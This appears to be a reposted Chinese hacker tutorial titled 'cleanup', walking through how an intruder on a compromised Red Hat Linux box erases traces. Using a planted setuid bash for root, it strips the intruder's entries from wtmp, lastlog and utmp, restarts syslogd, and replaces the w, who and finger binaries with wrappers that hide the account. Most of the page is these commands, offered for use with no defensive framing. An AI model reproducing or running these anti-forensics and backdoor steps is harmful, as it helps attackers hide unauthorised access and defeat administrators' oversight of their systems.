您的位置→首页→网络安全

黑客教学篇之大扫除

视窗杀毒网作者：佚名来源：互联网点击数：【字体：大中小】更新时间：2008年05月06日

前言：
通常很容易找到许多关于如何入侵一个系统的文章，可是往往人们很少提到打扫和安放后门的问题，许多newbie都不知道如何能够再一次方便的进入获得权限的机器，也不知道如何能去掉自己留下的痕迹。系统入侵、buffer溢出...之类的文章太多了。于是想起就随便写了几篇关于打扫和后门的文章，供大家参考。
在安盟里有许多孜孜不倦的为组织默默贡献的高手 lovehacker,jack,shellbash,jonak ... ...，在这我谨以此篇文章献给他们，我敬爱的战友。

1、unix的日志系统
有一些常识的人都知道，不同的unix系统版本都把日志记录到不同的目录下，而且有许多辅助的工具包（snort等)来帮助系统管理员来记录连接。有些系统管理员还修改syslog.conf来改变log的输出地址，保证不被入侵者来修改。但这些都不是我们今天讨论的东西。我们来看看通常unix的日志系统是由哪几个日志文件组成的。
utmp - [记录当前login的用户]
wtmp - [记录每次用户login和logout]
utmpx - [utmp的扩展]
wtmpx - [wtmp的扩展]
sulog - [每次su命令的使用]
xferlog - [FTP login记录]
lastlog - [记录最近用户成功login信息]
loginlog - [错误login记录]
messages - [后台程序消息记录]

下面我们用一次实战来继续讲解吧！(下面的地址和用户名都是修改过的）
bigshrimp@fuckXXX.com:~ > telnet 169.666.xxx.xxx
Trying 169.666.xxx.xxx...
Connected to 169.666.xxx.xxx.
Escape character is '^]'.

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
login: adm
Password:
bash$
====================================================================
注意：adm在这并不是root用户
====================================================================
bash$ w
11:15am up 21 days, 5:02, 1 user, load average: 1.00, 1.00, 1.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
adm pts/1 ppp-666-714-198- 11:11am 0.00s 0.10s ? -

===========================================================================
好的，看来root并不在上面，我们可以继续了。
===========================================================================
bash$ cd /tmp/.cron
bash$ ./bash
bash# cd /var/log
===========================================================================
事先copy好的一份bash使我成了root.注意我的提示符由$变成了#.
通常Linux,Solaris,BSD下的 wtmp lastlog message都在/var/log下面。
我们先要对付的是wtmp,它记录着用户的每一次login和logout.
然后是lastlog, 然后是message,最后是utmp。请记住顺序。
===========================================================================
bash# last
adm pts/1 ppp-666-714-198- Tue Oct 1 11:11 still logged in
adm pts/1 ppp-666-714-198- Tue Oct 1 11:11 - 11:11 (00:00)
wtmp begins Tue Oct 1 07:06:46 2000

===========================================================================
看见了，该改改了。
===========================================================================
bash# cat wtmp | grep -v "adm" >> temp
bash# mv temp wtmp
bash# last

wtmp begins Tue Oct 1 11:39:38 2000
==========================================================================
看见了，我把wtmp中关于adm的login条目都剥去存在temp文件里，再copy覆盖wtmp.这样
不见的只有adm的记录。千万不要rm整个wtmp，那样和通知管理员有人入侵没什么区别。
==========================================================================
bash# cat lastlog | grep -v 666-714-198 >> temp
bash# mv temp lastlog
bash# cat lastlog
Binary file (standard input) matches
==========================================================================
看见了吗？在这我只是把我的机器地址部分做为特征串来剥离。只是因为也许有人从其他地址用
adm login,我们的目的只是去掉我们的痕迹，保留其他人留下的。当然也可以用ip地址来干。
==========================================================================
bash# cd /var/run
bash# who utmp
adm pts/1 Aug 1 11:11
bash# cat utmp | grep -v "adm" >> temp
bash# mv temp utmp
bash# who utmp
bash#

==========================================================================
好了，到/var/run/下去改utmp吧！和wtmp同样的方法。
记住，如果你使用了ftp 请用清除lastlog的方法把xferlog也清了。
===========================================================================

bash# /usr/bin/killall -HUP syslogd

===========================================================================
把syslogd重启一下
===========================================================================
断线离开。
结束

其他方法：修改bin程序
我们把那些容易用来发现我们的bin程序都给他改了看看。当然不是真的改程序了，只是一个小技巧，

bash# cd /usr/bin/
bash# mv w .w
bash# mv who .who
bash# mv finger .finger

===========================================================================
把这些程序都变成隐藏的，当然隐藏的方法有许多种可以自由发挥。
===========================================================================

bash# echo "/usr/bin/.w | grep -v adm" >> w
bash# echo "/usr/bin/.who | grep -v adm" >> who
bash# echo "/usr/bin/.finger | grep -v adm" >> finger
bash# chmod +x w
bash# chmod +x who
bash# chmod +x finger
============================================================================
好了这么一来，adm这个用户就隐形了。
============================================================================

当然用一些现成的程序去大扫除也可以的，那样要更方便和安全一些。
有关程序可以去